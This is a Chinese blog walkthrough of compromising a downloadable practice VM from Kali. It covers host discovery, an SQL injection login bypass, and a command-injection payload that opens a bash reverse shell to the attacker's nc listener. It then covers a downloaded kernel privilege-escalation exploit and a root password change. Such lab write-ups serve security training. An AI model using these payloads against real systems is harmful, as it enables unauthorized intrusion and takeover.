kali对未知web server透测试1

靶机渗透

主机IP
kali192.168.101.62
靶机未知

靶机探测

靶机下载:https://pan.baidu.com/s/1P8s-ntf05dRSWOg_LrxD_Q
提取码:1234
1.打开靶机
在这里插入图片描述
选择我已移动该虚拟机
在这里插入图片描述

  1. 打开kali进行信息收集
    netdiscover -i eth1 -r 192.168.101.0/24 #探测主机

在这里插入图片描述
因为这里使用的桥接网卡所以可以探测当前路由器连接的所有设备。
这里看名字可以得到虚拟机ip:192.168.101.63
使用nmap探测发现开放80
在这里插入图片描述

  1. 访问web界面
    在这里插入图片描述
    发现登录框,使用弱密码登录失败,使用sql注入。
    万能密码
账号:随便
密码:' OR '1'='1

进入下个界面
命令执行漏洞
在这里插入图片描述

这里应该是命令执行漏洞
在这里插入图片描述
命令执行漏洞是利用Linux一行命令执行多条命令这一特点,使用分号";"、连字符"&、&&"、竖线"||"连接两条命令进行shell反弹。
我们这里尝试使用命令进行查看主机密码
在这里插入图片描述
查看用户配置文件
在这里插入图片描述
尝试查看密码
在这里插入图片描述

权限提升

发现权限不够
这里我们利用漏洞反弹shell
使用kali中的nc工具开一个监听端口
nc -lvp 5555
在这里插入图片描述

在web界面执行
127.0.0.1;bash -i >& /dev/tcp/192.168.101.62/5555 0>&1

在这里插入图片描述

在这里插入图片描述
这里成功反弹shell
在这里插入图片描述
执行命令查看当前Linux版本,到网上寻找提权脚本。
linux 2.6.9-55.el i686 exploit
在这里插入图片描述

在这里插入图片描述
在kali中新建一个shell
开启apache2并把提权脚本放入web目录下
在这里插入图片描述
然后使用反弹的shell进行下载提权脚本到靶机内

因为tmp目录权限较高,进入tmp目录下载提权脚本。在这里插入图片描述
进行编译提权
在这里插入图片描述
修改root密码实现ssh登录
在这里插入图片描述
使用ssh工具连接
在这里插入图片描述
在这里插入图片描述
连接成功,成功渗透。

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安恬之心

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值